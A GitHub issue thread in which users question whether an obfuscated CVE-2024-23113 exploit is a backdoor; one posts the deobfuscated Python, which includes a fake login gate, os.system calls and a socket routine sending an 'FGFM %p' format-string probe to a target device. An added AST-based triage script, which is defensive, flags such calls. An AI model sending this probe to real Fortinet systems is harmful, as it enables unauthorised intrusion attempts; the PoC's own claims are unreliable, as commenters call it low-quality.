OxLmahdi / cve-2024-23113

MIT License

issue #1

Open stickybit001 opened 1 month ago

stickybit001 commented 1 month ago

Is this exploit working? Did you obfuscate the source code?

opstoken commented 1 month ago

it seems like a backdoor

stickybit001 commented 1 month ago

yes, same, I didn't trust how the code is obfuscated!! Could you find the PoC somewhere? It was publicly available. Shall we report to GitHub..?? @opstoken

OxLmahdi commented 1 month ago

There is no backdoor.. If in doubt, then you can check on VMware

sec13b commented 1 month ago

Simple: upload the correct Python script, and we can check whether or not it has a backdoor.

OxLmahdi commented 1 month ago

I used obfuscation to give the script.. simply bypass the obfuscation and check, bye

cryzetho commented 3 weeks ago

Surprisingly, it turned out to be a legitimate script and not a backdoor after deobfuscating it. Here's the original python code:

import socket
import sys
import os
import time
import random
import string
import requests
from requests.structures import CaseInsensitiveDict

def Axak(xak):
    for x in xak:
        sys.stdout.write(x)
        sys.stdout.flush()

def xak(xak):
    xak = xak + '\n'
    for x in xak:
        sys.stdout.write(x)
        sys.stdout.flush()
        time.sleep(0.04)

def xak2(xak):
    xak = xak + '\n'
    for x in xak:
        sys.stdout.write(x)
        sys.stdout.flush()
        time.sleep(0.07)

logo = '''   


 ██████╗ ██╗  ██╗██╗     ███╗   ███╗ █████╗ ██╗  ██╗██████╗ ██╗
██╔═══██╗╚██╗██╔╝██║     ████╗ ████║██╔══██╗██║  ██║██╔══██╗██║
██║   ██║ ╚███╔╝ ██║     ██╔████╔██║███████║███████║██║  ██║██║
██║   ██║ ██╔██╗ ██║     ██║╚██╔╝██║██╔══██║██╔══██║██║  ██║██║
╚██████╔╝██╔╝ ██╗███████╗██║ ╚═╝ ██║██║  ██║██║  ██║██████╔╝██║
 ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═════╝ ╚═╝

              WELCOME CVE-2024-23113            

[-] AUTHOR    : Mahdi Hasan
[-] GITHUB    : oxLmahdi

'''

r = '\x1b[1;31m'
g = '\x1b[1;32m'
y = '\x1b[1;33m'
b = '\x1b[1;34m'
p = '\x1b[1;35m'
c = '\x1b[1;36m'
w = '\x1b[1;37m'

print(logo)

user = str(input('\n' + g + 'USERNAME FOR  (INBOX-ME) \n \n' + w + 'USERNAME ' + r + '=>' + y + ' '))
pas = str(input('\n' + g + 'PASSWORD FOR (INBOX ME) \n \n' + w + 'PASSWORD ' + r + '=>' + y + ' '))

if user == 'mahdi' and pas == '1234':
    Axak(g + '\n\n\t\t      LOGIN SUCCESSFUL \x1aJOIN MY FACEBOOK GROUP ')
    os.system('xdg-open https://www.facebook.com/profile.php?id=61559826326987')
else:
    Axak(y + '\n\n\t\t      Invalid User Or Pass')
    Axak(y + '\n\n\t\tContract Admin For User And Pass')
    os.system('xdg-open https://www.facebook.com/profile.php?id=61559826326987')
    os.system('python S-BOOMB.py')

def create_payload():
    return b'FGFM %p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-'

def exploit(ip, port):
    try:
        print(f'[*] Starting exploit attempt on {ip}:{port}...')
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print(f'[*] Attempting to connect to {ip}:{port}...')
        s.connect((ip, port))
        print(f'[*] Successfully connected to {ip}:{port}.')
        payload = create_payload()
        print(f'[*] Sending payload: {payload.decode()}...')
        s.send(payload)
        print(f'[*] Response from target:\n{s.recv(4096).decode(errors="ignore")}')
        s.close()
        print('[*] Connection closed.')
    except socket.error as err:
        print(f'[!] Socket error: {err}')
        sys.exit(1)

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print(f'Usage: {sys.argv[0]} <target_ip> <target_port>')
        sys.exit(1)
    exploit(sys.argv[1], int(sys.argv[2]))

The corresponding deobfuscated bytecode is attached as a text file (bytecode.txt).

I can also share a script that outputs the attached bytecode for further proof, or if any of you want to try it out yourself.

Still, very weird on why you would even obfuscate this in the first place if there's nothing to hide. I can only assume because it's a CVE, but usually this is not a problem on GitHub. I mean yeah, it does execute os.system(), but it just opens his Facebook page and the S-BOOMB.py doesn't exist and is also never created at any point in time.

Thank you for this challenge mahdi, was fun to reverse.
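The question this thread keeps circling back to, whether an obfuscated PoC hides anything beyond what its author claims, can be answered without running the script at all. The following is an added example, not code from this thread or from the repository: it walks a Python file's AST and reports the calls a reviewer cares about (shell execution, dynamic code loading, network sockets) plus hard-coded credential comparisons, and then checks whether any `python <file>` command a shell call spawns refers to a file that actually exists next to the script. The embedded `SAMPLE` is a constructed, shortened stand-in for the deobfuscated script quoted above; its profile URL is a placeholder, and the function names (`triage`, `missing_script_targets`, `summary`) are this example's own.

```python
"""Static triage of a Python proof-of-concept before it is executed.

Added example (not from the issue thread or the repository). SAMPLE below is a
constructed, shortened stand-in for the deobfuscated script in the thread.
"""
import ast
import os

# Call targets worth a second look in a PoC you did not write yourself.
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
               "subprocess.call", "subprocess.check_output"}
DYNAMIC_CALLS = {"exec", "eval", "compile", "marshal.loads", "pickle.loads",
                 "base64.b64decode", "__import__"}
NETWORK_CALLS = {"socket.socket", "requests.get", "requests.post",
                 "urllib.request.urlopen"}

# Constructed sample: the same shape as the thread's script, with a placeholder URL.
SAMPLE = '''
import os, sys, socket
user = input("USERNAME => ")
pas = input("PASSWORD => ")
if user == "mahdi" and pas == "1234":
    os.system("xdg-open https://example.invalid/profile")
else:
    os.system("python S-BOOMB.py")

def exploit(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(b"FGFM %p-%p-%p-%p-")
    s.close()

if __name__ == "__main__":
    exploit(sys.argv[1], int(sys.argv[2]))
'''


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _literal_str_arg(call):
    """First positional argument if it is a string literal, else None."""
    if call.args and isinstance(call.args[0], ast.Constant) \
            and isinstance(call.args[0].value, str):
        return call.args[0].value
    return None


def triage(source):
    """Return sorted (line, category, name, literal) findings for a Python source string."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:
                continue
            arg = _literal_str_arg(node)
            if name in SHELL_CALLS:
                findings.append((node.lineno, "shell", name, arg))
            elif name in DYNAMIC_CALLS:
                findings.append((node.lineno, "dynamic-code", name, arg))
            elif name in NETWORK_CALLS:
                findings.append((node.lineno, "network", name, arg))
        elif isinstance(node, ast.Compare):
            # Hard-coded gate of the form <name> == "<literal>" (dunders such as
            # __name__ == "__main__" are excluded).
            if (isinstance(node.left, ast.Name) and not node.left.id.startswith("__")
                    and len(node.ops) == 1 and isinstance(node.ops[0], ast.Eq)
                    and isinstance(node.comparators[0], ast.Constant)
                    and isinstance(node.comparators[0].value, str)):
                findings.append((node.lineno, "hardcoded-compare",
                                 node.left.id, node.comparators[0].value))
    return sorted(findings)


def missing_script_targets(findings, base_dir=".", exists=os.path.exists):
    """Scripts spawned via a shell call as 'python <file>' that do not exist in base_dir."""
    missing = []
    for _, category, _, literal in findings:
        if category == "shell" and literal and literal.startswith("python "):
            target = literal.split()[1]
            if not exists(os.path.join(base_dir, target)):
                missing.append(target)
    return missing


def summary(findings):
    """Count findings per category."""
    counts = {}
    for _, category, _, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


if __name__ == "__main__":
    found = triage(SAMPLE)
    for line, category, name, literal in found:
        print(f"line {line:>3}  {category:<18} {name}  {literal!r}")
    print("summary:", summary(found))
    print("spawned scripts not present on disk:", missing_script_targets(found))
```

Run against the sample this flags the two credential checks, the two `os.system` calls and the socket creation, and reports `S-BOOMB.py` as a spawned script that is not on disk, which is exactly the picture the deobfuscation above gives. An AST pass sees only literal strings, so a real review still has to follow any string built at runtime and any `exec`/`marshal` finding back to its data, but it is a cheap first filter before anything touches a VM.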

OxLmahdi commented 3 weeks ago

I obfuscated it because I'm learning obfuscation. If I share the original source code, nevertheless some people will say it's a backdoor.. thank you for proving this is not a backdoor.. If you don't have any problem, I can add you on Facebook

sec13b commented 3 weeks ago

@OxLmahdi all the CVEs on your account are the same as this.

cryzetho commented 3 weeks ago

> I obfuscated it because I'm learning obfuscation. If I share the original source code, nevertheless some people will say it's a backdoor.. thank you for proving this is not a backdoor.. If you don't have any problem, I can add you on Facebook

Sadly, I'm not using Facebook at all, however, I would be interested in the script you used to obfuscate the .py.

sec13b commented 3 weeks ago

cve garbage